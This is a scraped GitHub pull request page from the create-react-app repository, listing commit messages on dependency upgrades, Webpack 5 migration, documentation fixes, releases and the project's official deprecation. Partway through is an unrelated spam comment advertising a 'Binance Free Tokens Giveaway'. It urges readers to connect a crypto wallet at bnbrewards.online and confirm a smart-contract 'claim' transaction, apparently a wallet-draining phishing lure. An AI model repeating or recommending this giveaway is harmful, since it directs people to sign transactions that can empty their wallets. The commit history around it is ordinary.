React-app

sorrells81 opened the pull request:
<!--
Thank you for sending the PR!

If you changed any code, please provide us with clear instructions on how you verified your changes work. Bonus points for screenshots!

Happy contributing!
-->

nvh95 committed:
docs: Make hyperlink consistent

imdkbj committed:
Updated pace.js link

bitcoinbrisbane committed:
Chore:  Update document to GitHub default branch

GitHub now users `main` instead of `master` by default.

jasonwilliams committed:
Add support for Webpack 5 message objects (#10121)

Co-authored-by: Brody McKee <mrmckeb@gmail.com>

mohd-akram committed:
Unpin babel dependencies (#10797)

mrmckeb committed:
Remove ESLint verification when opting-out (#10499)

justingrant committed:
Add source-map-loader for debugging into original source of node_modules libraries that contain sourcemaps (#8227)

mrmckeb committed:
Coerce Node versions with metadata (#11057)

mrmckeb committed:
Update PostCSS version (#11121)

gaearon committed:
Run npm with --no-audit (#11176)

gaearon committed:
Switch branch name

mrmckeb committed:
Deprecate root level template.json keys (#11188)

pmmmwh committed:
fix: fast refresh stops on needed bail outs (#11105)

JLHwung committed:
chore: migrate to @babel/eslint-parser (#10761)

Co-authored-by: Brody McKee <mrmckeb@gmail.com>

iansu committed:
Update CODEOWNERS

Methuselah96 committed:
Remove package-lock.json (#11252)

Commit:
Webpack 5 (#11201)

Co-authored-by: Ian Schmitz <ianschmitz@gmail.com>
Co-authored-by: jasonwilliams <jase.williams@gmail.com>
Co-authored-by: Joseph Atkins-Turkish <spacerat3004@gmail.com>
Co-authored-by: e-w-h <46170930+e-w-h@users.noreply.github.com>
Co-authored-by: Shamprasad RH <shamprasad.rh@mail.weir>
Co-authored-by: James George <jamesgeorge998001@gmail.com>

iansu committed:
Prepare 5.0.0 alpha release

jonniebigodes committed:
Updates for the Storybook docs

hasanayan committed:
Update package.json

Commit:
Bump webpack-dev-server to 4.0.0-rc.1

fguitton committed:
fix: dependency issue after workbox-webpack-plugin 6.2 release (#11292)

* fix: Sub-dependency of workbox-webpack-plugin failed to yeild the correct version

* chore: Bump workbox-webpack-plugin to 6.2.4 to address regressions

Commit:
Bump webpack-dev-server to 4.0.0 and add babel preset

th7nder committed:
Merge branch 'main' into t-1127-webpack-dev-server

th7nder committed:
Migrate deprecated functions, add new lockfile and node 14

Commit:
yarn compile:lockfile

raix committed:
Merge pull request #11318 from th7nder/t-1127-webpack-dev-server

hasanayan committed:
Merge branch 'facebook:main' into main

raix committed:
Merge pull request #11316 from hasanayan/main

lukekarrys committed:
Use npm v7 with workspaces for local development and testing (#11304)

lukekarrys committed:
Use env var to detect yarn or npm as the package manager (#11322)

iansu committed:
Prepare 5.0.0 alpha release

iansu committed:
Update CONTRIBUTING.md

merceyz committed:
Resolve dependency issues in v5 alpha (#11294)

dependabot[bot] committed:
Bump immer from 8.0.4 to 9.0.6 (#11364)

krreet committed:
Upgrade jest and related packages from 26.6.0 to 27.1.0 (#11338)

* Upgrade jest and related packages from 26.6.0 to 27.1.0

* adds the latest yarn.lock.cached file

* runs yarn compile:lockfile

* resolve conflicts with the main branch

* adds the package-lock : npm ci with npm7

* adds the package-lock : npm ci with npm7

* Revert yarn.lock.cached

* update postcss-normalize to 10.0.1 to resolve smoke test failures

Co-authored-by: reetkr <reetesh.kumar@blazeclan.com>

hasanayan committed:
allow CORS on webpack-dev-server (#11325)

* allow CORS on webpack-dev-server

* re-position header config on webpackDevServer config

dependabot[bot] committed:
Bump browserslist from 4.14.2 to 4.16.5 (#11476)

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

shfshanyue committed:
Bump template dependency version (#11415)

iansu committed:
Update CODEOWNERS

mrmckeb committed:
Remove dependency pinning (#11474)

Co-authored-by: Luke Karrys <luke@lukekarrys.com>

iansu committed:
Prepare 5.0.0 alpha release

jamesgeorge007 committed:
test(create-react-app): assert for exit code (#10973)

mrmckeb committed:
Fix ESLint Babel preset resolution (#11547)

Commit:
Update package.json (#11597)

leo committed:
The default port used by `serve` has changed (#11619)

raix committed:
Update webpack and dev server (#11646)

raix committed:
[WIP] Fix integration test teardown / cleanup and missing yarn installation (#11686)

MichaelDeBoey committed:
feat(eslint-config-react-app): support ESLint 8.x (#11375)

jd1048576 committed:
Update all dependencies (#11624)

lukekarrys committed:
Remove cached lockfile (#11706)

jawadsh123 committed:
fix(webpackDevServer): disable overlay for warnings (#11413)

lukekarrys committed:
chore(test): make all tests install with `npm ci` (#11723)

iansu committed:
Add support for Tailwind (#11717)

iansu committed:
Update CONTRIBUTING.md

iansu committed:
Publish

 - babel-plugin-named-asset-import@0.3.8
 - babel-preset-react-app@10.0.1
 - confusing-browser-globals@1.0.11
 - cra-template-typescript@1.1.3
 - cra-template@1.1.3
 - create-react-app@5.0.0
 - eslint-config-react-app@7.0.0
 - react-app-polyfill@3.0.0
 - react-dev-utils@12.0.0
 - react-error-overlay@6.0.10
 - react-scripts@5.0.0

iansu committed:
Update CONTRIBUTING.md

ddzz committed:
Update links in README

iansu committed:
Add docusaurus to workspaces, update lockfile

mubarakn committed:
prevent both npm and yarn commands from being copied (#11757)

jafin committed:
docs: Changelog 5.0.0 (#11805)

fishmandev committed:
Fix a typo in deployment.md (#11594)

wisammechano committed:
updated deprecated rules (#11622)

psiservices-justin-sullard committed:
Ensure posix compliant joins for urls in middleware (#11640)

iansu committed:
Ignore docs when publishing (#11985)

adamalston committed:
docs: update jest links

dmitryvinn committed:
docs: add homepage banner in support of Ukraine (#12113)

iansu committed:
Warn when not using the latest version of create-react-app but do not exit (#11915)

iansu committed:
Update lockfile

dependabot[bot] committed:
Bump minimist from 1.2.5 to 1.2.6

Bumps [minimist](https://github.com/substack/minimist) from 1.2.5 to 1.2.6.
- [Release notes](https://github.com/substack/minimist/releases)
- [Commits](https://github.com/substack/minimist/compare/1.2.5...1.2.6)

---
updated-dependencies:
- dependency-name: minimist
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>

shortcuts committed:
docs: update Algolia credentials (#12151)

yamankatby committed:
Update adding-a-router.md

Update React Router links to v6

MatanBobi committed:
chore: upgrade rtl version to support react 18 (#12223)

kyletsang committed:
Update templates to use React 18 `createRoot` (#12220)

apburnie committed:
fix: webpack noise printed only if error or warning (#12245)

iansu committed:
Prepare 5.0.1 release

iansu committed:
Publish

 - cra-template-typescript@1.2.0
 - cra-template@1.2.0
 - create-react-app@5.0.1
 - eslint-config-react-app@7.0.1
 - react-dev-utils@12.0.1
 - react-error-overlay@6.0.11
 - react-scripts@5.0.1

lukekarrys committed:
chore(lint): lint all files (#12288)

This change consolidates all lint rules and paths to the root of the
repo, and runs them as part of the `lint` workflow.

teemezzy committed:
Update getting-started.md

nvh95 committed:
fix: Reuse opening tab in Chrome Dev and Chrome Beta (#12412)

JSLGeeganage committed:
Update making-a-progressive-web-app.md

Couldn't find the URL for 'workbox-webpack-plugin'. The link has modified with the new URL.

leonid-omelchuk-jemmic committed:
update a debugger for VS Code

matrush committed:
Merge pull request #12521 from leonid-omelchuk-jemmic/feature--update-VS-Code-debugger

update a debugger for VS Code

matrush committed:
Merge pull request #12464 from JSLGeeganage/patch-1

Update making-a-progressive-web-app.md

matrush committed:
Merge pull request #12337 from teemezzy/patch-1

Update getting-started.md

matrush committed:
Merge pull request #12242 from yamankatby/patch-1

Update adding-a-router.md

matrush committed:
Merge pull request #11837 from ddzz/fix-readme-links

Update links in `README`

matrush committed:
Merge pull request #10696 from bitcoinbrisbane/patch-1

Chore:  Update document to GitHub default branch

matrush committed:
Apply suggestions from code review

Update URL

Co-authored-by: Nurlan Suyundukov <14142638+suyundukov@users.noreply.github.com>

matrush committed:
Merge branch 'main' into patch-1

matrush committed:
Merge pull request #10543 from imdkbj/patch-1

Updated pace.js link

matrush committed:
Merge pull request #12197 from facebook/dependabot/npm_and_yarn/minimist-1.2.6

Bump minimist from 1.2.5 to 1.2.6

matrush committed:
Merge pull request #11315 from jonniebigodes/chore_fix_storybook_instructions

Chore: (Docs) Updates for the Storybook docs

matrush committed:
Merge pull request #10501 from nvh95/patch-1

docs: Make hyperlink consistent

matrush committed:
Merge pull request #12080 from adamalston/12079-fix-jest-links

docs: update jest links

MoshiulRabbi committed:
update the heroku buildpack link

pawelskowronek committed:
Add missing instruction if you are adding typescript

When adding typescript to an existing Create React App project you have to have tsconfig.json in the project, I believe this change should clarify it for beginners getting stuck on this step. Not sure if providing an example would be too much so I have added a link to the tsconfig.json instead.

Commit:
docs: Add Link to Adding Routes Docs

Add a link to React Router docs specific to adding routes.

sdarnadeem committed:
fix broken link progressive web app

danielrentz committed:
VSCode debugger plugin deprecated

Remove reference to deprecated VSCode debugger plugin.
https://marketplace.visualstudio.com/items?itemName=msjsdiag.debugger-for-chrome

Commit:
fix code splitting link

matrush committed:
Merge pull request #12563 from rvdende/patch-1

fix code splitting link

matrush committed:
Merge pull request #12557 from sdarnadeem/patch-2

fix broken link progressive web app

matrush committed:
Merge pull request #12539 from liam-mulhall/patch-1

docs: Add Link to Adding Routes Docs

matrush committed:
Merge pull request #12531 from MoshiulRabbi/patch-1

update the heroku buildpack link

matrush committed:
Merge pull request #12537 from pawelskowronek/patch-1

Add missing instruction if you are adding typescript

matrush committed:
Merge pull request #12558 from danielrentz/patch-1

VSCode debugger plugin deprecated

jackblackevo committed:
docs: fix link of "Building for Relative Paths" (#12691)

eventualbuddha committed:
fix(babel-preset-react-app): add missing dependency (#12364)

In #11318 a change was made to `babel-preset-react-app` to require `@babel/plugin-proposal-private-property-in-object`, but no such dependency was added to `package.json`. This fixes that mistake by adding the dependency.

zpao committed:
Migrate from Azure Pipelines to GitHub Actions (#13222)

Beyond just a pure migration, this also:

- Drops Node 14 usage from CI (which also removes the need for explicit
  npm 8 installs)
- Removes the "old node" test, which just checked that installing on old
  node failed. We shouldn't need to test that
- Consolidates the build & test workflows so we don't end up with
  a proliferation of workflows.

manoharkumarmahto commented:
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

Olexandr88 committed:
Update running-tests.md

Update running-tests

eaviles committed:
Merge pull request #13644 from Olexandr88/patch-1

Update running-tests.md

MatanBobi committed:
chore: upgrade RTL version to avoid peer-deps mismatch

rickhanlonii committed:
Update types from #13725

Co-authored-by: Rajhans Jadhao <rajhans.jadhao@gmail.com>

rickhanlonii committed:
Fix tests

rickhanlonii committed:
Fix e2e tests

rickhanlonii committed:
Add act

rickhanlonii committed:
try this instead

rickhanlonii committed:
update react-scripts react devDep

rickhanlonii committed:
idk

rickhanlonii committed:
Update tests

rickhanlonii committed:
skip svg component test

rickhanlonii committed:
Merge pull request #13738 from MatanBobi/chores/update-rtl-version-rtl-16

fix: upgrade RTL version to avoid peer-deps mismatch

orta committed:
Deprecate Create React App officially by changing the README, and adding a message on init (#17003)

It's probably time to make this project document its status as being
deprecated and not recommended for production usage.

To change it:

- I opted to add a header to the README saying its over and you should
go look at https://react.dev/learn/start-a-new-react-project

- I left a note saying that if you are following, it is maybe worth
carrying on. While I hear react 19 doesn't work with CRA, I wouldn't be
surprised that a good chunk of tutorials would still work. Open to being
a bit more hard-lined there but there was a lot of great resources for
learning react in that era and it seems like a waste to be making people
stop early?

- I added a message inside the CLI, it shows once and says "don't use
this, use the stuff in
https://react.dev/learn/start-a-new-react-project"

---------

Co-authored-by: Ricky <rickhanlonii@gmail.com>
Co-authored-by: Rick Hanlon <rickhanlonii@fb.com>

rickhanlonii committed:
Update deprecation link (#17015)

Updates to a shortlink that we can redirect as needed for old versions.
Currently 404

rickhanlonii committed:
Add deprecation to website (#17008)

- Adds a banner with deprecation notice
- Adds a noindex meta tag to home page to remove from search
- Add og meta info for when noindex is ignored

rickhanlonii committed:
Publish

 - babel-plugin-named-asset-import@0.4.0
 - babel-preset-react-app@10.1.0
 - cra-template-typescript@1.3.0
 - cra-template@1.3.0
 - create-react-app@5.1.0
 - eslint-config-react-app@7.1.0
 - react-dev-utils@12.1.0
 - react-error-overlay@6.1.0
 - react-scripts@5.1.0
